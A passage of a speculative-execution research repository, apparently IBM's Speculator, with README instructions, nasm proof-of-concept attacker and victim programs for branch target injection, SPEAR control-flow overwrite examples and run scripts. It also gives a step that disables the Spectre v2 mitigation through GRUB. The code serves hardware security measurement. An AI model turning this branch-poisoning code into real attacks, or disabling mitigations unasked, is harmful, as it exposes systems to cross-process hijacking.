on what was used in the attacker. Hence, the victim 22 | performance counters should show that one of the verify location has been 23 | speculative executed. 24 | 25 | To compile and run the victim by itself: 26 | ``` 27 | ln -s $SPEC_H/examples/BTI/*.asm $SPEC_H/tests/ 28 | cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" 29 | ninja -C $SPEC_B install 30 | sudo $SPEC_I/speculator_mon -q -r 1000 -o $SPEC_I/results/speculator_output -v $SPEC_I/tests/bti_victim/bti_victim 31 | ``` 32 | The results always show no hits for the marker (assuming LD_BLOCK.STORE_FORWARD is the 1st programmable counter specified, otherwise adjust -f X accordingly): 33 | ``` 34 | cat $SPEC_I/results/speculator_output | cut -d "|" -f 4| grep -v LD | sort | uniq -c 35 | ``` 36 | because no hijacked is performed. 37 | 38 | If we re-run the test introducing the attacker process: 39 | ``` 40 | sudo $SPEC_I/speculator_mon -q -r 1000 -o $SPEC_I/results/speculator_output -v $SPEC_I/tests/bti_victim/bti_victim -a $SPEC_I/tests/bti_attacker/bti_attacker -s 41 | cat $SPEC_I/results/speculator_output | cut -d "|" -f 4| grep -v LD | sort | uniq -c 42 | ``` 43 | Based on the target selected at line 49 in `examples/BTI/bti_attacker.asm` (e.g. 44 | verify, verify2 and verify3) we should see 1, 3 or 6 markers be hit. 45 | The success rate really depends on the current settings of the machine (e.g. 46 | kernel version, security patches installed and enabled mitigations). 47 | 48 | On KabyLake i7-8650U we have results around ~950 successful hijack over 1000 49 | tries. 50 | 51 | ## Known problems 52 | BTI is very sensible to various parameters which might drastically change the 53 | success rate of the injection. Hereafter, a non-complete list of them 54 | 55 | ### History length 56 | To be able to poison a specific indirect call or jump, we need to make sure that 57 | the previous jump/call history sequence is the same between attacker and victim. 58 | The longer is the matching sequence before the interested call/jump between 59 | victim and attacker the higher are the chances of success. 60 | 61 | If the attacker does not work please consider to uncomment the `jmpnext` macros 62 | in both attacker and victim. Those macros add a sequence of instruction that 63 | maximize the POC chances of success. 64 | 65 | ### Alignment 66 | To be able to perform BTI successfully, it is necessary that attacker and victim 67 | are perfectly aligned to be able to fool the CPU. To quick check the correct 68 | alignment run: 69 | 70 | ``` 71 | objdump -D $SPEC_I/tests/bti_attacker/bti_attacker | egrep -e "(verify.*|call)>:" 72 | objdump -D $SPEC_I/tests/bti_victim/bti_victim | egrep -e "(verify.*|call)>:" 73 | ``` 74 | Between the two output, the same label should have the same address in each 75 | output. 76 | 77 | ### Are BTI mitigations enabled? 78 | This test would not provide successful results on machines that have mitigations 79 | enforced. To verify the status of the machine mitigations check: 80 | 81 | ``` 82 | cat /sys/devices/system/cpu/vulnerabilities/spectre_v2 83 | ``` 84 | 85 | if STIBP is forced then the attack would not work. 86 | It will be necessary to add `nospectre_v2` to `GRUB_CMDLINE_LINUX_DEFAULT` in `/etc/default/grub` 87 | and then run: 88 | 89 | ``` 90 | sudo update-grub && reboot 91 | ``` 92 | to effectively disable such mitigation. 93 | 94 | In case the mitigation is marked as conditional, it should not affect the tests 95 | since they neither use prctl to enable the mitigation nor use SECCOMP which 96 | would trigger STIBP when activated. 97 | 98 | ### Kernel version 99 | For some reason the same CPU with different kernel versions (which has the same 100 | mitigations settings) has different success rate. We attribute this different behavior on 101 | the scheduler decisions. To tune the attack you can play with the following 102 | Speculator options: 103 | 104 | `-s` which force serialization between attacker and victim (victim is started when 105 | attacker has finished its execution) 106 | 107 | `-d` adds delay between the start of victim and the attacker in nanosecond (To be 108 | noticed is that a big delay is known to degradate the signal so do not push it 109 | too far :) ) 110 | 111 | ### Is the attacker running in the right co-located thread? 112 | One possible reason for this attack not to be working is that the machine has 113 | not SMT enabled and/or the attacker process is not running on a co-located 114 | thread compared to the victim. Speculator default value for the co-located 115 | thread is 5 since most of our cpus have 4 cores/8 threads but each CPU/OS pair enumerates differently. 116 | 117 | Check the output of: 118 | ``` 119 | cat /proc/cpuinfo | egrep -e "(processor|core id)" 120 | ``` 121 | to indentify the right co-located thread. 122 | Once you indentified the processor number, you can simply re-run cmake with 123 | `-DATTACKER=X` to propagate this piece of information. 124 | 125 | For instance: 126 | 127 | ``` 128 | cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" -DATTACKER=5 129 | ``` 130 | -------------------------------------------------------------------------------- /examples/BTI/bti_attacker.asm: -------------------------------------------------------------------------------- 1 | [BITS 64] 2 | %include "common.inc" 3 | %include "pmc.inc" 4 | 5 | section .data 6 | 7 | dev_file: db '/dev/cpu/',ATTACKER_PROCESS_STR,'/msr',0 8 | iteration: dq 1 9 | fd: dq 0 10 | val: dq 0 11 | len: equ $-val 12 | array: times 2048 db 0 13 | addr: dq 0 14 | align 1024 15 | ;##### DATA STARTS HERE ######## 16 | 17 | ;##### DATA ENDS HERE ######## 18 | 19 | section .text 20 | global perf_test_entry:function 21 | 22 | ; INDIRECT CALL TRAINED BY ATTACKER 23 | bti_call: 24 | call [addr] 25 | ret 26 | 27 | perf_test_entry: 28 | push rbp 29 | mov rbp, rsp 30 | sub rsp, 0 31 | check_pinning ATTACKER_PROCESS 32 | msr_open 33 | msr_seek 34 | mov QWORD[iteration], 1 35 | align 512 36 | 37 | attacker: 38 | ; Train code for BTI 39 | .train: 40 | ;jmpnext256 41 | ;jmpnext256 42 | mov QWORD[addr], verify 43 | lfence 44 | 45 | reset_counter 46 | start_counter 47 | align 64 48 | .call: 49 | call bti_call 50 | stop_counter 51 | 52 | dec QWORD[iteration] 53 | cmp QWORD[iteration], 0 54 | jge .train 55 | .exit: 56 | msr_close 57 | exit 0 58 | 59 | align 1024 60 | verify: 61 | ret 62 | 63 | align 1024 64 | correct: 65 | ret 66 | 67 | align 1024 68 | verify2: 69 | ret 70 | 71 | fillerteststart: resb (0x1 << 14) 72 | align 1024 73 | verify3: 74 | ret 75 | -------------------------------------------------------------------------------- /examples/BTI/bti_victim.asm: -------------------------------------------------------------------------------- 1 | [BITS 64] 2 | %include "common.inc" 3 | %include "pmc.inc" 4 | 5 | section .data 6 | 7 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 8 | fd: dq 0 9 | val: dq 0 10 | len: equ $-val 11 | array: times 2048 db 0 12 | addr: dq 0 13 | align 1024 14 | ;##### DATA STARTS HERE ######## 15 | 16 | ;##### DATA ENDS HERE ######## 17 | 18 | section .text 19 | global perf_test_entry:function 20 | 21 | ; HIJACKED CALLED IN THE VICTIM 22 | bti_call: 23 | call [addr] 24 | ret 25 | 26 | perf_test_entry: 27 | push rbp 28 | mov rbp, rsp 29 | sub rsp, 0 30 | check_pinning VICTIM_PROCESS 31 | msr_open 32 | msr_seek 33 | 34 | align 512 35 | 36 | victim: 37 | ;jmpnext256 38 | ;jmpnext256 39 | mov QWORD[addr], correct 40 | clflush[addr] 41 | lfence 42 | 43 | reset_counter 44 | start_counter 45 | align 64 46 | .call: 47 | call bti_call 48 | 49 | stop_counter 50 | 51 | msr_close 52 | exit 0 53 | 54 | lfence 55 | align 1024 56 | verify: 57 | ; 1 LD_BLOCK.STORE_FORWARD markers 58 | mov DWORD[array], eax 59 | mov DWORD[array+4], edx 60 | movq xmm0, QWORD[array] 61 | lfence 62 | ret 63 | 64 | align 1024 65 | correct: 66 | lfence 67 | ret 68 | 69 | align 1024 70 | verify2: 71 | ; 3 LD_BLOCK.STORE_FORWARD markers 72 | mov DWORD[array], eax 73 | mov DWORD[array+4], edx 74 | movq xmm0, QWORD[array] 75 | 76 | mov DWORD[array], eax 77 | mov DWORD[array+4], edx 78 | movq xmm0, QWORD[array] 79 | 80 | mov DWORD[array], eax 81 | mov DWORD[array+4], edx 82 | movq xmm0, QWORD[array] 83 | lfence 84 | ret 85 | 86 | 87 | fillerteststart: resb (0x1 << 14) 88 | align 1024 89 | verify3: 90 | ; 6 LD_BLOCK.STORE_FORWARD markers 91 | mov DWORD[array], eax 92 | mov DWORD[array+4], edx 93 | movq xmm0, QWORD[array] 94 | 95 | mov DWORD[array], eax 96 | mov DWORD[array+4], edx 97 | movq xmm0, QWORD[array] 98 | 99 | mov DWORD[array], eax 100 | mov DWORD[array+4], edx 101 | movq xmm0, QWORD[array] 102 | 103 | mov DWORD[array], eax 104 | mov DWORD[array+4], edx 105 | movq xmm0, QWORD[array] 106 | 107 | mov DWORD[array], eax 108 | mov DWORD[array+4], edx 109 | movq xmm0, QWORD[array] 110 | 111 | mov DWORD[array], eax 112 | mov DWORD[array+4], edx 113 | movq xmm0, QWORD[array] 114 | 115 | lfence 116 | ret 117 | -------------------------------------------------------------------------------- /examples/SPEAR/architectural/backward_edge/arch_bwd.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | 21 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 22 | ;dev_file: db '/dev/cpu/',ATTACKER_PROCESS_STR,'/msr',0 23 | fd: dq 0 24 | offset: dq 0 25 | val: dq 0 26 | len: equ $-val 27 | array: resb 128 28 | warmup_cnt: dd 11 29 | filler: resb 256 30 | stored_ret: dq 0 31 | filler2: resb 256 32 | counter: dq 0 33 | target: dq 0 34 | ;##### DATA STARTS HERE ######## 35 | 36 | ;##### DATA ENDS HERE ######## 37 | 38 | section .text 39 | global perf_test_entry:function 40 | global snippet:function 41 | 42 | perf_test_entry: 43 | push rbp 44 | mov rbp, rsp 45 | sub rsp, len 46 | 47 | check_pinning VICTIM_PROCESS 48 | ;check_pinning ATTACKER_PROCESS 49 | msr_open 50 | msr_seek 51 | 52 | start_counter 53 | mov QWORD[counter], 10 54 | mov QWORD[target], perf_test_entry.back 55 | .start: 56 | reset_counter 57 | call start 58 | .back: 59 | cmp QWORD[counter], 0 60 | jl .exit 61 | jg .skip 62 | 63 | mov QWORD[target], hijacked ; target for overwrite 64 | 65 | .skip: 66 | dec QWORD[counter] 67 | jmp .start 68 | .exit: 69 | ret 70 | 71 | start: 72 | ; save old ret 73 | mov rax,[rsp] 74 | mov [stored_ret], rax 75 | 76 | ; architectural overwrite 77 | mov rax, [target] 78 | mov [rsp], rax 79 | 80 | ; evicting original value 81 | clflush [stored_ret] 82 | lfence 83 | 84 | ; check current value with original 85 | ; to see if overwrite has happened 86 | mov rax, [rsp] 87 | cmp rax, [stored_ret] 88 | jne my_exit 89 | 90 | ; return speculate with the arch overwritten value 91 | ret 92 | 93 | my_exit: 94 | stop_counter 95 | 96 | msr_close 97 | exit 0 98 | lfence 99 | 100 | hijacked: 101 | mov DWORD[array], eax 102 | mov DWORD[array+4], edx 103 | movq xmm0, QWORD[array] 104 | 105 | mov DWORD[array], eax 106 | mov DWORD[array+4], edx 107 | movq xmm0, QWORD[array] 108 | 109 | mov DWORD[array], eax 110 | mov DWORD[array+4], edx 111 | movq xmm0, QWORD[array] 112 | 113 | lfence 114 | ret 115 | -------------------------------------------------------------------------------- /examples/SPEAR/architectural/forward_edge/arch_fwd.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | 21 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 22 | ;dev_file: db '/dev/cpu/',ATTACKER_PROCESS_STR,'/msr',0 23 | fd: dq 0 24 | offset: dq 0 25 | val: dq 0 26 | len: equ $-val 27 | array: resb 128 28 | warmup_cnt: dd 11 29 | filler: resb 256 30 | stored_target: dq 0 31 | filler2: resb 256 32 | counter: dq 0 33 | target: dq 0 34 | ;##### DATA STARTS HERE ######## 35 | 36 | ;##### DATA ENDS HERE ######## 37 | 38 | section .text 39 | global perf_test_entry:function 40 | global snippet:function 41 | 42 | perf_test_entry: 43 | push rbp 44 | mov rbp, rsp 45 | sub rsp, len 46 | 47 | check_pinning VICTIM_PROCESS 48 | ;check_pinning ATTACKER_PROCESS 49 | msr_open 50 | msr_seek 51 | 52 | reset_counter 53 | start_counter 54 | 55 | mov QWORD[counter], 10 56 | mov QWORD[target], correct 57 | mov QWORD[stored_target], correct 58 | .start: 59 | reset_counter 60 | ; Flush valued used for checking forward edge integrity 61 | clflush [stored_target] 62 | lfence 63 | ; Check if forward edge has been modified and fail if it is 64 | mov rax, QWORD[target] 65 | cmp rax, QWORD[stored_target] 66 | jne my_exit 67 | ; Perform the indirect call 68 | call QWORD[target] 69 | .back: 70 | cmp QWORD[counter], 0 71 | jl .exit 72 | jg .skip 73 | 74 | mov QWORD[target], hijacked 75 | .skip: 76 | dec QWORD[counter] 77 | jmp .start 78 | .exit: 79 | ret 80 | 81 | correct: 82 | lfence 83 | ret 84 | 85 | hijacked: 86 | mov DWORD[array], eax 87 | mov DWORD[array+4], edx 88 | movq xmm0, QWORD[array] 89 | 90 | mov DWORD[array], eax 91 | mov DWORD[array+4], edx 92 | movq xmm0, QWORD[array] 93 | 94 | mov DWORD[array], eax 95 | mov DWORD[array+4], edx 96 | movq xmm0, QWORD[array] 97 | 98 | hlt 99 | lfence 100 | ret 101 | 102 | my_exit: 103 | msr_close 104 | exit 0 105 | 106 | -------------------------------------------------------------------------------- /examples/SPEAR/link_spear.zsh: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | # Copyright 2021 IBM Corporation 3 | # 4 | # Licensed under the Apache License, Version 2.0 (the "License"); 5 | # you may not use this file except in compliance with the License. 6 | # You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License. 15 | 16 | 17 | ln -s $SPEC_H/examples/SPEAR/architectural/backward_edge/arch_bwd.asm $SPEC_H/tests 18 | ln -s $SPEC_H/examples/SPEAR/architectural/forward_edge/arch_fwd.asm $SPEC_H/tests 19 | ln -s $SPEC_H/examples/SPEAR/speculative/backward_edge/spec_bwd.asm $SPEC_H/tests 20 | ln -s $SPEC_H/examples/SPEAR/speculative/forward_edge/spec_fwd.asm $SPEC_H/tests 21 | -------------------------------------------------------------------------------- /examples/SPEAR/run_spear.zsh: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | # Copyright 2021 IBM Corporation 3 | # 4 | # Licensed under the Apache License, Version 2.0 (the "License"); 5 | # you may not use this file except in compliance with the License. 6 | # You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License. 15 | 16 | if (( ${+SPEC_I} )) then 17 | echo -e "\e[33mSPEC_I is set to ${SPEC_I}\e[39m" 18 | else 19 | echo -e "\e[31mERROR: SPEC_I must be properly set\e[39m" 20 | exit 21 | fi 22 | 23 | if (( ${+SPEC_H} )) then 24 | echo -e "\e[33mSPEC_H is set to ${SPEC_H}\e[39m" 25 | else 26 | echo -e "\e[31mERROR: SPEC_H must be properly set\e[39m" 27 | exit 28 | fi 29 | 30 | if (( ${+SPEC_B} )) then 31 | echo -e "\e[33mSPEC_B is set to ${SPEC_B}\e[39m" 32 | else 33 | echo -e "\e[31mERROR: SPEC_B must be properly set\e[39m" 34 | exit 35 | fi 36 | 37 | cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" -DCANARY=ON 38 | 39 | ninja -C $SPEC_B install 40 | 41 | sudo $SPEC_I/speculator_mon -r1000 -v $SPEC_I/tests/arch_fwd/arch_fwd -o $SPEC_I/results/arch_fwd -c $SPEC_I/speculator.json 42 | sudo $SPEC_I/speculator_mon -r1000 -v $SPEC_I/tests/arch_bwd/arch_bwd -o $SPEC_I/results/arch_bwd -c $SPEC_I/speculator.json 43 | sudo $SPEC_I/speculator_mon -r1000 -v $SPEC_I/tests/spec_fwd/spec_fwd -o $SPEC_I/results/spec_fwd -c $SPEC_I/speculator.json 44 | sudo $SPEC_I/speculator_mon -r1000 -v $SPEC_I/tests/spec_bwd/spec_bwd -o $SPEC_I/results/spec_bwd -c $SPEC_I/speculator.json 45 | 46 | echo -e "\e[33mArchitecture Forward Edge Overwrite \e[39m" 47 | cat $SPEC_I/results/arch_fwd | cut -d "|" -f 4 | grep -v LD | sort | uniq -c | awk '{if ($2==3) printf "%d-%d\n", $1, $2}' 48 | echo -e "\e[33mArchitecture Backward Edge Overwrite \e[39m" 49 | cat $SPEC_I/results/arch_bwd | cut -d "|" -f 4 | grep -v LD | sort | uniq -c | awk '{if ($2==3) printf "%d-%d\n", $1, $2}' 50 | echo -e "\e[33mSpeculative Forward Edge Overwrite \e[39m" 51 | cat $SPEC_I/results/spec_fwd | cut -d "|" -f 4 | grep -v LD | sort | uniq -c | awk '{if ($2==3) printf "%d-%d\n", $1, $2}' 52 | echo -e "\e[33mSpeculative Backward Edge Overwrite \e[39m" 53 | cat $SPEC_I/results/spec_bwd | cut -d "|" -f 4 | grep -v LD | sort | uniq -c | awk '{if ($2==3) printf "%d-%d\n", $1, $2}' 54 | 55 | -------------------------------------------------------------------------------- /examples/SPEAR/speculative/backward_edge/spec_bwd.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | 21 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 22 | ;dev_file: db '/dev/cpu/',ATTACKER_PROCESS_STR,'/msr',0 23 | fd: dq 0 24 | warmup_cnt_fake: dd 1 25 | offset: dq 0 26 | val: dq 0 27 | len: equ $-val 28 | array: resb 128 29 | warmup_cnt: dd 1 30 | filler: resb 256 31 | target: dq 0 32 | ;##### DATA STARTS HERE ######## 33 | 34 | ;##### DATA ENDS HERE ######## 35 | 36 | section .text 37 | global perf_test_entry:function 38 | global snippet:function 39 | global victim:function 40 | 41 | extern set_write_code 42 | 43 | perf_test_entry: 44 | push rbp 45 | mov rbp, rsp 46 | sub rsp, len 47 | 48 | mov QWORD[target], correct 49 | 50 | check_pinning VICTIM_PROCESS 51 | ;check_pinning ATTACKER_PROCESS 52 | msr_open 53 | msr_seek 54 | .data: 55 | clflush [warmup_cnt] 56 | mov eax, 0 57 | cpuid 58 | lfence 59 | reset_counter 60 | start_counter 61 | mov ebx, DWORD[warmup_cnt] 62 | cmp ebx, 12 63 | je .else 64 | ;##### SNIPPET STARTS HERE ###### 65 | call victim 66 | .back 67 | ;##### SNIPPET ENDS HERE ###### 68 | lfence 69 | .else: 70 | lfence 71 | stop_counter 72 | 73 | inc DWORD[warmup_cnt] 74 | cmp DWORD[warmup_cnt], 12 75 | jl .again 76 | jg .skip 77 | mov QWORD[target], hijacked 78 | .again 79 | jmp .data 80 | .skip: 81 | msr_close 82 | exit 0 83 | 84 | victim: 85 | mov rax, QWORD[target] 86 | mov QWORD[rsp], rax 87 | ret 88 | lfence 89 | 90 | hijacked: 91 | mov DWORD[array], eax 92 | mov DWORD[array+4], edx 93 | movq xmm0, QWORD[array] 94 | 95 | mov DWORD[array], eax 96 | mov DWORD[array+4], edx 97 | movq xmm0, QWORD[array] 98 | 99 | mov DWORD[array], eax 100 | mov DWORD[array+4], edx 101 | movq xmm0, QWORD[array] 102 | 103 | 104 | lfence 105 | ret 106 | 107 | correct: 108 | jmp perf_test_entry.back 109 | ret 110 | -------------------------------------------------------------------------------- /examples/SPEAR/speculative/forward_edge/spec_fwd.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | 21 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 22 | ;dev_file: db '/dev/cpu/',ATTACKER_PROCESS_STR,'/msr',0 23 | fd: dq 0 24 | warmup_cnt_fake: dd 1 25 | offset: dq 0 26 | val: dq 0 27 | len: equ $-val 28 | array: resb 128 29 | warmup_cnt: dd 1 30 | filler: resb 256 31 | target: dq 0 32 | ;##### DATA STARTS HERE ######## 33 | 34 | ;##### DATA ENDS HERE ######## 35 | 36 | section .text 37 | global perf_test_entry:function 38 | global snippet:function 39 | global victim:function 40 | 41 | perf_test_entry: 42 | push rbp 43 | mov rbp, rsp 44 | sub rsp, len 45 | 46 | check_pinning VICTIM_PROCESS 47 | ;check_pinning ATTACKER_PROCESS 48 | msr_open 49 | msr_seek 50 | mov QWORD[target], correct 51 | .data: 52 | clflush [warmup_cnt] 53 | mov eax, 0 54 | cpuid 55 | lfence 56 | reset_counter 57 | start_counter 58 | mov ebx, DWORD[warmup_cnt] 59 | cmp ebx, 12 60 | je .else 61 | ;##### SNIPPET STARTS HERE ###### 62 | call [target] 63 | ;##### SNIPPET ENDS HERE ###### 64 | lfence 65 | .else: 66 | lfence 67 | stop_counter 68 | 69 | inc DWORD[warmup_cnt] 70 | cmp DWORD[warmup_cnt], 12 71 | jl .again 72 | jg .skip 73 | mov QWORD[target], victim 74 | .again: 75 | jmp .data 76 | .skip: 77 | msr_close 78 | exit 0 79 | 80 | victim: 81 | mov QWORD[target], hijacked 82 | call QWORD[target] 83 | ret 84 | lfence 85 | 86 | hijacked: 87 | mov DWORD[array], eax 88 | mov DWORD[array+4], edx 89 | movq xmm0, QWORD[array] 90 | 91 | mov DWORD[array], eax 92 | mov DWORD[array+4], edx 93 | movq xmm0, QWORD[array] 94 | 95 | mov DWORD[array], eax 96 | mov DWORD[array+4], edx 97 | movq xmm0, QWORD[array] 98 | 99 | lfence 100 | ret 101 | 102 | correct: 103 | lfence 104 | ret 105 | -------------------------------------------------------------------------------- /examples/clflush_in_speculation/clflush_in_speculation_cached.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 2 24 | fill2: times 62 db 0 25 | 26 | junk: db 1 27 | fill3: times 63 db 0 28 | 29 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 30 | fd: dq 0 31 | val: dq 0 32 | len: equ $-val 33 | lea_array: times 40 db 0 34 | ;##### DATA STARTS HERE ######## 35 | 36 | ;##### DATA ENDS HERE ######## 37 | 38 | section .text 39 | global perf_test_entry:function 40 | global snippet:function 41 | 42 | perf_test_entry: 43 | push rbp 44 | mov rbp, rsp 45 | sub rsp, len 46 | 47 | check_pinning VICTIM_PROCESS 48 | msr_open 49 | msr_seek 50 | .data: 51 | clflush [warmup_cnt] 52 | clflush [junk] 53 | lfence 54 | mov eax, DWORD[junk] 55 | lfence 56 | mov eax, 0 57 | cpuid 58 | lfence 59 | reset_counter 60 | start_counter 61 | mov ebx, DWORD[warmup_cnt] 62 | cmp ebx, 12 63 | je .else 64 | ;##### SNIPPET STARTS HERE ###### 65 | 66 | ;##### SNIPPET ENDS HERE ###### 67 | clflush [junk] 68 | ;lea rax, [lea_array+rax*2] 69 | lfence 70 | .else: 71 | mov eax, DWORD[junk] 72 | lfence 73 | stop_counter 74 | 75 | inc DWORD[warmup_cnt] 76 | cmp DWORD[warmup_cnt], 13 77 | jl .data 78 | 79 | msr_close 80 | exit 0 81 | -------------------------------------------------------------------------------- /examples/clflush_in_speculation/clflush_in_speculation_uncached.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 2 24 | fill2: times 62 db 0 25 | 26 | junk: db 1 27 | fill3: times 63 db 0 28 | 29 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 30 | fd: dq 0 31 | val: dq 0 32 | len: equ $-val 33 | lea_array: times 40 db 0 34 | ;##### DATA STARTS HERE ######## 35 | 36 | ;##### DATA ENDS HERE ######## 37 | 38 | section .text 39 | global perf_test_entry:function 40 | global snippet:function 41 | 42 | perf_test_entry: 43 | push rbp 44 | mov rbp, rsp 45 | sub rsp, len 46 | 47 | check_pinning VICTIM_PROCESS 48 | msr_open 49 | msr_seek 50 | .data: 51 | clflush [warmup_cnt] 52 | clflush [junk] 53 | lfence 54 | mov eax, 0 55 | cpuid 56 | lfence 57 | reset_counter 58 | start_counter 59 | mov ebx, DWORD[warmup_cnt] 60 | cmp ebx, 12 61 | je .else 62 | ;##### SNIPPET STARTS HERE ###### 63 | 64 | ;##### SNIPPET ENDS HERE ###### 65 | clflush[junk] 66 | ;lea rax, [lea_array+rax*2] 67 | lfence 68 | .else: 69 | mov eax, DWORD[junk] 70 | lfence 71 | stop_counter 72 | 73 | inc DWORD[warmup_cnt] 74 | cmp DWORD[warmup_cnt], 13 75 | jl .data 76 | 77 | msr_close 78 | exit 0 79 | -------------------------------------------------------------------------------- /examples/corr_issued_and_exec/corr_issued_and_exec.json: -------------------------------------------------------------------------------- 1 | { 2 | "DATA": [ 3 | "something: dq 0", 4 | "something2: dq 0" 5 | ], 6 | 7 | "INST": [ 8 | "lea rax, [lea_array+rax*2]", 9 | "lea rax, [lea_array+rax*2]", 10 | "lea rax, [lea_array+rax*2]", 11 | "lea rax, [lea_array+rax*2]", 12 | "lea rax, [lea_array+rax*2]", 13 | "lea rax, [lea_array+rax*2]", 14 | "lea rax, [lea_array+rax*2]", 15 | "lea rax, [lea_array+rax*2]", 16 | "lea rax, [lea_array+rax*2]", 17 | "lea rax, [lea_array+rax*2]", 18 | "lea rax, [lea_array+rax*2]", 19 | "lea rax, [lea_array+rax*2]", 20 | "lea rax, [lea_array+rax*2]", 21 | "lea rax, [lea_array+rax*2]", 22 | "lea rax, [lea_array+rax*2]", 23 | "lea rax, [lea_array+rax*2]", 24 | "lea rax, [lea_array+rax*2]", 25 | "lea rax, [lea_array+rax*2]", 26 | "lea rax, [lea_array+rax*2]", 27 | "lea rax, [lea_array+rax*2]", 28 | "lea rax, [lea_array+rax*2]", 29 | "lea rax, [lea_array+rax*2]", 30 | "lea rax, [lea_array+rax*2]", 31 | "lea rax, [lea_array+rax*2]", 32 | "lea rax, [lea_array+rax*2]", 33 | "lea rax, [lea_array+rax*2]", 34 | "lea rax, [lea_array+rax*2]", 35 | "lea rax, 